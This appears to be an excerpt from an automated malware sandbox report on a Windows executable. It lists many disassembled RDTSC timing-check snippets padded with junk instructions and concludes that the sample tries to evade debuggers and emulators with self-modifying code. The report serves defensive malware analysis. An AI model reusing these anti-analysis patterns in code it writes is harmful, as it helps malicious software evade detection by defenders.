Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9167E second address: 4D916A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, FE01h 0x00000007 push eax 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov word ptr [edx+30h], ax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAA4EF80D2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D916A4 second address: 4D916AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D916AA second address: 4D9171B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAA4EF80CCh 0x00000009 add esi, 41FAE578h 0x0000000f jmp 00007FFAA4EF80CBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ax, word ptr [esi+32h] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FFAA4EF80D1h 0x00000026 sbb ecx, 05AE7616h 0x0000002c jmp 00007FFAA4EF80D1h 0x00000031 popfd 0x00000032 mov edx, ecx 0x00000034 popad 0x00000035 mov word ptr [edx+32h], ax 0x00000039 jmp 00007FFAA4EF80CAh 0x0000003e mov eax, dword ptr [esi+34h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9171B second address: 4D91721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91721 second address: 4D91730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91730 second address: 4D91734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91734 second address: 4D91765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFAA4EF80CEh 0x00000014 sub ecx, 6F7583C8h 0x0000001a jmp 00007FFAA4EF80CBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91765 second address: 4D9176A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9176A second address: 4D91814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FFAA4EF80CEh 0x0000000c or ecx, 029E8628h 0x00000012 jmp 00007FFAA4EF80CBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test ecx, 00000700h 0x00000021 pushad 0x00000022 mov dl, al 0x00000024 pushfd 0x00000025 jmp 00007FFAA4EF80D1h 0x0000002a or ah, 00000046h 0x0000002d jmp 00007FFAA4EF80D1h 0x00000032 popfd 0x00000033 popad 0x00000034 jne 00007FFB14F66018h 0x0000003a jmp 00007FFAA4EF80CEh 0x0000003f or dword ptr [edx+38h], FFFFFFFFh 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FFAA4EF80CEh 0x0000004a jmp 00007FFAA4EF80D5h 0x0000004f popfd 0x00000050 mov ch, 8Bh 0x00000052 popad 0x00000053 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov ecx, 6F89D5DBh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91814 second address: 4D91819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91819 second address: 4D91839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dh, 7Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or dword ptr [edx+40h], FFFFFFFFh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 call 00007FFAA4EF80CEh 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91839 second address: 4D91881 instructions: 0x00000000 rdtsc 0x00000002 mov bx, C116h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FFAA4B0AF27h 0x0000000e xor ecx, 723F5D9Eh 0x00000014 jmp 00007FFAA4B0AF29h 0x00000019 popfd 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91881 second address: 4D91885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91885 second address: 4D9188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9188B second address: 4D91891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91891 second address: 4D91895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91895 second address: 4D91899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91899 second address: 4D918D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FFAA4B0AF28h 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAA4B0AF27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0537 second address: 4DB0572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAA4EF80CBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAA4EF80D0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0572 second address: 4DB0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0578 second address: 4DB057E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB057E second address: 4DB0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0582 second address: 4DB05BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FFAA4EF80D4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAA4EF80D7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB05BA second address: 4DB05C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB05C0 second address: 4DB05C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70517 second address: 4D7051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7051C second address: 4D7052C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7052C second address: 4D70530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70530 second address: 4D70536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70536 second address: 4D7053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7053E second address: 4D7054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov al, dl 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7054E second address: 4D705A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 popad 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 popad 0x00000011 push dword ptr [ebp+04h] 0x00000014 jmp 00007FFAA4B0AF1Fh 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c jmp 00007FFAA4B0AF26h 0x00000021 push dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FFAA4B0AF1Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705A8 second address: 4D705B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705B7 second address: 4D705BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705BD second address: 4D705C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91C05 second address: 4D91C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAA4B0AF1Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91C2D second address: 4D91C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FFAA4EF80CEh 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5049D second address: 4D504A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504A1 second address: 4D504A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504A7 second address: 4D504F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f lock xadd dword ptr [ecx], eax 0x00000013 jmp 00007FFAA4B0AF20h 0x00000018 inc eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007FFAA4B0AF1Dh 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504F6 second address: 4D50527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FFAA4EF80CCh 0x00000013 adc eax, 2C2E57D8h 0x00000019 jmp 00007FFAA4EF80CBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50527 second address: 4D50531 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov dh, cl 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0936 second address: 4DA094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CB3 second address: 4DA0CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4641660Ah 0x00000008 mov dh, D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov bl, 65h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FFAA4B0AF1Eh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CDD second address: 4DA0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CE1 second address: 4DA0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 380AE172h 0x00000012 jmp 00007FFAA4B0AF23h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0B39 second address: 4DA0BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFAA4EF80CDh 0x00000014 xor ecx, 51DB35C6h 0x0000001a jmp 00007FFAA4EF80D1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FFAA4EF80D0h 0x00000026 sbb eax, 2E188E68h 0x0000002c jmp 00007FFAA4EF80CBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop eax 0x0000003a pushfd 0x0000003b jmp 00007FFAA4EF80D7h 0x00000040 jmp 00007FFAA4EF80D3h 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0931 second address: 4DB09A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, 9Dh 0x00000013 pushfd 0x00000014 jmp 00007FFAA4B0AF1Ah 0x00000019 or ax, 9BB8h 0x0000001e jmp 00007FFAA4B0AF1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov di, cx 0x0000002a mov ebx, ecx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 jmp 00007FFAA4B0AF1Fh 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FFAA4B0AF25h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0296 second address: 4DC029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC029C second address: 4DC02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02A0 second address: 4DC02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4EF80CBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02B6 second address: 4DC02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov di, 6B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A52 second address: 4D80A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A58 second address: 4D80A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A5E second address: 4D80A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A62 second address: 4D80A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FFAA4B0AF24h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAA4B0AF27h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A9B second address: 4D80AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AA1 second address: 4D80AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D505A0 second address: 4D505A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D505A6 second address: 4D50636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FFAA4B0AF20h 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAA4B0AF1Ch 0x0000001b add cl, FFFFFFB8h 0x0000001e jmp 00007FFAA4B0AF1Bh 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FFAA4B0AF24h 0x0000002d adc ch, 00000018h 0x00000030 jmp 00007FFAA4B0AF1Bh 0x00000035 popfd 0x00000036 popad 0x00000037 or eax, FFFFFFFFh 0x0000003a jmp 00007FFAA4B0AF26h 0x0000003f lock xadd dword ptr [ecx], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50636 second address: 4D5063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5063A second address: 4D50640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50640 second address: 4D506A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAA4EF80D2h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FFAA4EF80CBh 0x0000000f sbb si, 74EEh 0x00000014 jmp 00007FFAA4EF80D9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d dec eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFAA4EF80D8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506A1 second address: 4D506B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506B0 second address: 4D506B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506B6 second address: 4D506BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C65 second address: 4D70C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edx, 3153A514h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C89 second address: 4D70C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C9B second address: 4D70C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C9F second address: 4D70CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e pushfd 0x0000000f jmp 00007FFAA4B0AF26h 0x00000014 or al, 00000058h 0x00000017 jmp 00007FFAA4B0AF1Bh 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFAA4B0AF20h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70CE9 second address: 4D70CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91A34 second address: 4D91AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FFAA4B0AF21h 0x00000017 or esi, 53E70866h 0x0000001d jmp 00007FFAA4B0AF21h 0x00000022 popfd 0x00000023 mov eax, 5C89F897h 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FFAA4B0AF24h 0x00000031 add cx, 0338h 0x00000036 jmp 00007FFAA4B0AF1Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 call 00007FFAA4B0AF22h 0x00000047 pop esi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91AD3 second address: 4D91AF8 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, 59151EF3h 0x0000000c popad 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAA4EF80D5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00C8 second address: 4DA00CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00CE second address: 4DA00D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00D2 second address: 4DA00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00D6 second address: 4DA0141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FFAA4EF80D9h 0x00000010 sub si, B586h 0x00000015 jmp 00007FFAA4EF80D1h 0x0000001a popfd 0x0000001b mov eax, 69225737h 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 pushad 0x00000023 call 00007FFAA4EF80D8h 0x00000028 mov ch, 44h 0x0000002a pop ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d call 00007FFAA4EF80CAh 0x00000032 pop esi 0x00000033 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
